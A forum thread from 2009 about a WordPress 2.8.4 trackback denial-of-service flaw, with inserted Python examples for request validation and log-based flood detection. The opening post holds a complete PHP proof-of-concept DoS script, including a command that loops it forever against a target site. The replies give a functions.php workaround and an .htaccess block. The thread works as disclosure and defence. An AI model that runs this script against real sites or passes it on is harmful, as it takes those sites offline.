GoFuckYourself.com - Adult Webmaster Forum

wordpress security: *must read* exploit not fixed in 2.8.4 (https://gfy.com/showthread.php?t=934296)

fris 10-20-2009 08:45 AM

wordpress security: *must read* exploit not fixed in 2.8.4
 
There's currently an exploit out for 2.8.4 which isn't patched, that will allow someone to exhaust your site using a DoS against certain file(s).

Here is the POC (proof of concept)

Code:

<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * [email protected] contacted and get a response,
 * but no solution available.
 *
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <[email protected]>
 *
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 *
 */
if(count($argv) < 2)
    die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
    if(!$fp)
        die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
        echo "hit!\n";
    }
}
?>

And here is the *temp* fix until they patch it

Add this to your theme's functions.php file

Code:

<?php

// WP Trackback Temp Fix

// Hooked on 'init', so it runs before wp-trackback.php does any work.
// It only acts when the request is for wp-trackback.php and carries the
// oversized 'charset' POST field that the resource-exhaustion PoC sends.
function ft_stop_trackback_dos_attacks(){
    global $pagenow;
    if ( 'wp-trackback.php' == $pagenow ){
        // DoS attack fix: a legitimate charset name ("UTF-8", "ISO-8859-1")
        // is short; anything longer is refused before WordPress tries to
        // convert the trackback text with it.
        if ( isset($_POST['charset']) ){
            $charset = $_POST['charset'];
            if ( strlen($charset) > 50 ) { die; }
        }
    }
}
add_action('init','ft_stop_trackback_dos_attacks');

?>

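A Python stand-in for the check the functions.php snippet above performs, added here as an illustration and not code from the thread or from WordPress: it rejects oversized bodies before parsing, caps every trackback field, and refuses comma-separated charset lists like the one the PoC sends, all before anything would attempt a charset conversion. The per-field limits, the 16 KB body cap, the sample bodies and the function names are constructed assumptions; only the 50-byte charset threshold comes from the fix posted above.

```python
"""Validate a trackback POST body before any charset conversion happens.

Added example (not code from the thread or from WordPress). The limits
below are assumptions chosen for illustration; the 50-byte charset cap
mirrors the thread's functions.php fix.
"""
from urllib.parse import parse_qs

# Per-field caps in decoded characters. A real charset name is well under
# 50 bytes; the other limits are assumed generous bounds for a trackback.
FIELD_LIMITS = {
    "charset": 50,
    "url": 2048,
    "title": 1024,
    "blog_name": 256,
    "excerpt": 4096,
}
MAX_BODY_BYTES = 16 * 1024  # assumption: a legitimate trackback is a few KB


def check_trackback_body(body: bytes):
    """Return (allowed, reason) for a raw x-www-form-urlencoded body."""
    # Cheapest check first: refuse huge bodies without parsing them at all.
    if len(body) > MAX_BODY_BYTES:
        return False, f"body too large: {len(body)} bytes"
    # latin-1 keeps one character per byte so percent-decoding is the only
    # transformation parse_qs applies.
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    for name, limit in FIELD_LIMITS.items():
        values = fields.get(name, [])
        if len(values) > 1:
            return False, f"duplicate field: {name}"
        if values and len(values[0]) > limit:
            return False, f"{name} too long: {len(values[0])} > {limit}"
    charset = fields.get("charset", [""])[0]
    # The PoC's charset is a long comma-separated list of encodings; a
    # trackback should name exactly one, so separators are refused outright.
    if any(ch in charset for ch in ",; \t"):
        return False, "charset must be a single encoding name"
    if "url" not in fields:
        return False, "url is required"
    return True, "ok"


# Constructed sample bodies (not captured traffic).
BENIGN_BODY = (
    b"charset=UTF-8&url=http%3A%2F%2Fblog.example%2Fpost%2F1"
    b"&title=Nice+post&blog_name=Example+Blog&excerpt=Worth+a+read"
)
# Shaped like the thread's PoC: 'charset' padded to 140000 bytes of "UTF-8,".
FLOOD_BODY = b"charset=" + (b"UTF-8%2C" * 17500) + b"&url=www.example.com&title=lol"

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("flood", FLOOD_BODY)):
        allowed, reason = check_trackback_body(body)
        print(f"{label}: allowed={allowed} ({reason})")
```

The order of the checks is the point: the body-size test runs before `parse_qs` so the cost of rejecting a 140 KB request is a length comparison, not a parse; the field caps and the single-charset rule then catch smaller payloads that still name many encodings at once.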

Lace 10-20-2009 08:59 AM

Damn, just went and updated all of my sites recently too.

Thanks, Fris.

Cutty 10-20-2009 09:08 AM

Thanks mate, cheerio.

Ginn 10-20-2009 09:10 AM

Thanks for the info. I'll update everything now.

greg80 10-20-2009 09:40 AM

What are you upgrading to? He said the exploit still exists in 2.8.4 (current version).

greg80 10-20-2009 09:40 AM

Quote:

Originally Posted by greg80 (Post 16447546)
What are you upgrading to? He said the exploit still exists in 2.8.4 (current version).

edit: ok, I read it again. Thanks fris.

Cyber Fucker 10-20-2009 09:46 AM

Thx for the info!

TheDA 10-20-2009 09:59 AM

Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

Can the default functions.php just be copied over to the theme folder? What else needs to be done?

CYF 10-20-2009 10:02 AM

bumping up some good info, thanks fris

Stephen 10-20-2009 10:58 AM

Quote:

Originally Posted by CYF (Post 16447643)
bumping up some good info, thanks fris

ditto and thanks :thumbsup

skinnay 10-20-2009 11:07 AM

This is nowhere near the risk of the vulnerability that was recently patched by WordPress.

fris 10-20-2009 01:11 PM

Quote:

Originally Posted by TheDA (Post 16447629)
Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

Can the default functions.php just be copied over to the theme folder? What else needs to be done?

It's currently in the 2.8.4 core; it hasn't been updated yet.

You can add that code to your theme's functions.php file, which overrides any core functions that you have applied in functions.php.

Nicky 10-20-2009 01:19 PM

Thanks man, updating the most important ones now, will wait for the new release for the smaller blogs.

TheSenator 10-20-2009 01:43 PM

Shit....this may help some people...It's a plugin

http://fullthrottledevelopment.com/w...ck-dos-attacks


I turned off my trackbacks years ago but I think it is still there to exploit.

TheDA 10-20-2009 03:22 PM

Quote:

Originally Posted by fris (Post 16448392)
It's currently in the 2.8.4 core; it hasn't been updated yet.

You can add that code to your theme's functions.php file, which overrides any core functions that you have applied in functions.php.

What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

I don't need to do anything else to call the functions.php or anything from any other files?

Big E 10-20-2009 03:24 PM

If you have pingbacks/trackbacks turned off, can you just dev/null it via .htaccess?

<Files wp-trackback.php>
Order Deny,Allow
Deny from all
</Files>

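Whether or not wp-trackback.php is denied as above, a run of the PoC shows up in the web server's access log as a burst of POSTs to that file from one client, since the script loops forever and forks six senders per run. The following is an added example (not from the thread) that flags clients exceeding a request rate over a sliding window; the combined-format log lines, the addresses and the 10-requests-in-10-seconds threshold are constructed assumptions.

```python
"""Spot a trackback flood in an Apache/nginx combined-format access log.

Added example, not from the thread. Log lines below are constructed,
not captured; thresholds are assumptions to tune for your traffic.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Leading part of the combined log format: client, timestamp, request line,
# status, response size. Referer and user agent are not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed thresholds: more than 10 trackback POSTs from one IP inside 10 seconds.
WINDOW = timedelta(seconds=10)
THRESHOLD = 10


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], TS_FMT)
    return m["ip"], ts, m["method"], m["path"].split("?")[0]


def find_trackback_floods(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {ip: timestamp} for clients whose POSTs to wp-trackback.php
    exceed `threshold` within any `window`; the timestamp is the first line
    at which the client crossed the threshold."""
    recent = defaultdict(deque)  # ip -> timestamps of its recent trackback POSTs
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        if method != "POST" or not path.endswith("/wp-trackback.php"):
            continue
        q = recent[ip]
        q.append(ts)
        # Drop timestamps that have aged out of the sliding window.
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def _line(ip, hhmmss, method="POST", path="/wordpress/wp-trackback.php", status=200):
    """Build one constructed combined-format log line."""
    return (f'{ip} - - [20/Oct/2009:{hhmmss} -0700] "{method} {path} HTTP/1.1" '
            f'{status} 1532 "-" "Mozilla/5.0"')


# Constructed sample: one legitimate trackback plus normal browsing from
# 198.51.100.7, and twelve trackback POSTs in five seconds from 203.0.113.5.
SAMPLE_LOG = [
    _line("198.51.100.7", "08:40:01"),
    _line("198.51.100.7", "08:40:05", "GET", "/wordpress/"),
] + [_line("203.0.113.5", f"08:45:{s:02d}") for s in range(6) for _ in range(2)]

if __name__ == "__main__":
    for ip, ts in find_trackback_floods(SAMPLE_LOG).items():
        print(f"trackback flood from {ip}, threshold crossed at {ts:%H:%M:%S}")
```

Feed it real lines with `find_trackback_floods(open("/var/log/apache2/access.log"))` and the same logic applies; a single legitimate trackback never comes near the threshold, so a hit from this rule is a reasonable trigger for a temporary firewall block on the source address.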
fris 10-20-2009 03:39 PM

Quote:

Originally Posted by TheDA (Post 16449009)
What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

I don't need to do anything else to call the functions.php or anything from any other files?

Yes, you can add it to a file called functions.php if you don't have one currently.

TheDA 10-20-2009 03:50 PM

Quote:

Originally Posted by fris (Post 16449071)
Yes, you can add it to a file called functions.php if you don't have one currently.

Okay, thanks.

digifan 10-20-2009 03:54 PM

Awesome, thanks guys!

fatfoo 10-20-2009 03:59 PM

Exploit not fixed? Thanks for posting. Interesting read.

d-null 10-20-2009 04:10 PM

thanks for the info...


fuck wordpress is a pain in the ass

digitaldivas 10-20-2009 04:12 PM

...good looking out Fris

Argos88 10-20-2009 05:04 PM

the exploit is FIXED..

The problem you are referring to has to do with some permissions that a user can set. The problem you are referring to can be more possible on MU if the admin doesn't know how to configure it.

If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.

18teens 10-20-2009 05:42 PM

Thanks for the info.

fris 10-20-2009 06:34 PM

Quote:

Originally Posted by Argos88 (Post 16449342)
the exploit is FIXED..

The problem you are referring to has to do with some permissions that a user can set. The problem you are referring to can be more possible on MU if the admin doesn't know how to configure it.

If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.

This actually hasn't been fixed; I asked one of the core WordPress developers in a chat this morning. There is a fix if you edit a certain file, but if you download 2.8.4 from the site, the issue is not fixed.

fris 10-20-2009 06:35 PM

Never mind, 2.8.5 has been released with the fix.

d-null 10-20-2009 08:13 PM

Quote:

Originally Posted by fris (Post 16449509)
Never mind, 2.8.5 has been released with the fix.

I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so :1orglaugh

TheSenator 10-20-2009 08:34 PM

Quote:

Originally Posted by d-null (Post 16449724)
I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so :1orglaugh

Well, I'd rather keep upgrading than lose a day's worth of work fixing exploits. I have too much money invested in my WordPress blogs.

TheDA 10-21-2009 07:46 AM

Quote:

Originally Posted by fris (Post 16449509)
Never mind, 2.8.5 has been released with the fix.

Let's see what this version brings :)

